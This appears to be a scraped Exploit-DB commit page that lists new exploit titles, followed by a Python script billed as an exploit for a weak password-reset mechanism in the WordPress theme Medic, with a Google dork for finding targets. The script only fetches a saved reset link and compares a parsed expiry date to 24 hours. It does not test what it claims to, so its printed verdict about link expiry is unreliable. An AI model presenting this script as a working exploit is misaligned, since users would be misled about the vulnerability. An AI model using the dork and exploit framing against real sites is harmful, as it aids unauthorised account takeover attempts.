147824bdba
8 changes to exploits/shellcodes/ghdb Symantec SiteMinder WebAgent v12.52 - Cross-site scripting (XSS) BoxBilling<=4.22.1.5 - Remote Code Execution (RCE) Diafan CMS 6.0 - Reflected Cross-Site Scripting (XSS) Groomify v1.0 - SQL Injection Jobpilot v2.61 - SQL Injection Sales Tracker Management System v1.0 - Multiple Vulnerabilities Student Study Center Management System v1.0 - Stored Cross-Site Scripting (XSS) The Shop v2.5 - SQL Injection WordPress Theme Medic v1.0.0 - Weak Password Recovery Mechanism for Forgotten Password Zoneminder < v1.37.24 - Log Injection & Stored XSS & CSRF Bypass
44 lines
No EOL
1.9 KiB
Python
Executable file
44 lines
No EOL
1.9 KiB
Python
Executable file
# Exploit Title: WordPress Theme Medic v1.0.0 - Weak Password Recovery Mechanism for Forgotten Password
|
|
# Dork: inurl:/wp-includes/class-wp-query.php
|
|
# Date: 2023-06-19
|
|
# Exploit Author: Amirhossein Bahramizadeh
|
|
# Category : Webapps
|
|
# Vendor Homepage: https://www.templatemonster.com/wordpress-themes/medic-health-and-medical-clinic-wordpress-theme-216233.html
|
|
# Version: 1.0.0 (REQUIRED)
|
|
# Tested on: Windows/Linux
|
|
# CVE: CVE-2020-11027
|
|
|
|
import requests
|
|
from bs4 import BeautifulSoup
|
|
from datetime import datetime, timedelta
|
|
|
|
# Set the WordPress site URL and the user email address
|
|
site_url = 'https://example.com'
|
|
user_email = 'user@example.com'
|
|
|
|
# Get the password reset link from the user email
|
|
# You can use any email client or library to retrieve the email
|
|
# In this example, we are assuming that the email is stored in a file named 'password_reset_email.html'
|
|
with open('password_reset_email.html', 'r') as f:
|
|
email = f.read()
|
|
soup = BeautifulSoup(email, 'html.parser')
|
|
reset_link = soup.find('a', href=True)['href']
|
|
print(f'Reset Link: {reset_link}')
|
|
|
|
# Check if the password reset link expires upon changing the user password
|
|
response = requests.get(reset_link)
|
|
if response.status_code == 200:
|
|
# Get the expiration date from the reset link HTML
|
|
soup = BeautifulSoup(response.text, 'html.parser')
|
|
expiration_date_str = soup.find('p', string=lambda s: 'Password reset link will expire on' in s).text.split('on ')[1]
|
|
expiration_date = datetime.strptime(expiration_date_str, '%B %d, %Y %I:%M %p')
|
|
print(f'Expiration Date: {expiration_date}')
|
|
|
|
# Check if the expiration date is less than 24 hours from now
|
|
if expiration_date < datetime.now() + timedelta(hours=24):
|
|
print('Password reset link expires upon changing the user password.')
|
|
else:
|
|
print('Password reset link does not expire upon changing the user password.')
|
|
else:
|
|
print(f'Error fetching reset link: {response.status_code} {response.text}')
|
|
exit() |